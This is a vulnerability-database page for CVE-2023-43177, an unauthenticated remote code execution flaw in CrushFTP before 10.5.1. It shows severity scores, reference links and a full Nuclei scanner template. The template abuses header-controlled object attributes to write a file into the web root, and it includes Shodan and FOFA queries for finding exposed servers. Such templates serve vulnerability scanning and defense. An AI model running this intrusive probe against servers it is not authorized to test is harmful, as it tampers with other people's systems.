Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-43177HistoryDec 12, 2023 - 9:13 a.m.
CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
2023-12-1209:13:40
ProjectDiscovery
github.com
135
cve
cve2023
crushftp
unauthenticated
rce
improper
control
modification
dynamic
object
attributes
critical
http
intrustive
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
9.4
Confidence
High
EPSS
0.958
Percentile
99.5%
CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
id: CVE-2023-43177
info:
name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-43177
- https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
- https://blog.projectdiscovery.io/crushftp-rce/
- https://github.com/the-emmons/CVE-Disclosures/blob/main/Pending/CrushFTP-2023-1.md
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-43177
cwe-id: CWE-913
epss-score: 0.96402
epss-percentile: 0.99567
cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: crushftp
product: crushftp
shodan-query: http.html:"crushftp"
fofa-query: body="crushftp"
tags: cve,cve2023,crushftp,unauth,rce,intrusive
flow: http(1) && http(2) && http(3)
variables:
dirname: "{{randbase(5)}}"
filename: "{{randbase(5)}}"
http:
- method: GET
path:
- "{{BaseURL}}/WebInterface"
matchers:
- type: dsl
internal: true
dsl:
- contains_all(to_lower(header), "currentauth", "crushauth")
- method: POST
path:
- "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"
headers:
Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}"
as2-to: X
user_name: crushadmin{{dirname}}
user_log_path: "./WebInterface/{{dirname}}/"
user_log_file: "{{filename}}"
Content-Type: application/x-www-form-urlencoded
body: |
post=body
matchers:
- type: regex
regex:
- "crushadmin"
- method: GET
path:
- "{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}"
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "crushadmin{{dirname}}")
condition: and
# digest: 4a0a00473045022100e013ea63ca1f07dde63ec297ffbbd1f37e560231c1396d3dd07debcc39e7a17502202b87f70d993704c3d894534a22f376c9b0e545474adef184c0f7ca697a37708b:922c64590222798bb761d5b6d8e72950Related
nvd
nvd
CVE-2023-43177
2023-11-18 00:15:07
cve
cve
CVE-2023-43177
2023-11-18 00:15:07
cvelist
cvelist
CVE-2023-43177
2023-11-17 00:00:00
vulnrichment
vulnrichment
CVE-2023-43177
2023-11-17 00:00:00
packetstorm
packetstorm
CrushFTP Remote Code Execution
2024-04-15 00:00:00
metasploit
metasploit
CrushFTP Unauthenticated RCE
2024-03-25 11:41:24
attackerkb
attackerkb
CVE-2023-43177
2023-11-18 00:00:00
CVE-2024-4040
2024-04-22 00:00:00
prion
prion
Design/Logic Flaw
2023-11-18 00:15:00
githubexploit
githubexploit
zdt
zdt
CrushFTP Remote Code Execution Exploit
2024-04-15 00:00:00
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up 04/19/24
2024-04-19 18:42:39
thn
thn
Warning: 3 Critical Vulnerabilities Expose ownCloud Users to Data Breaches
2023-11-25 04:00:00
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
9.4
Confidence
High
EPSS
0.958
Percentile
99.5%
Related for NUCLEI:CVE-2023-43177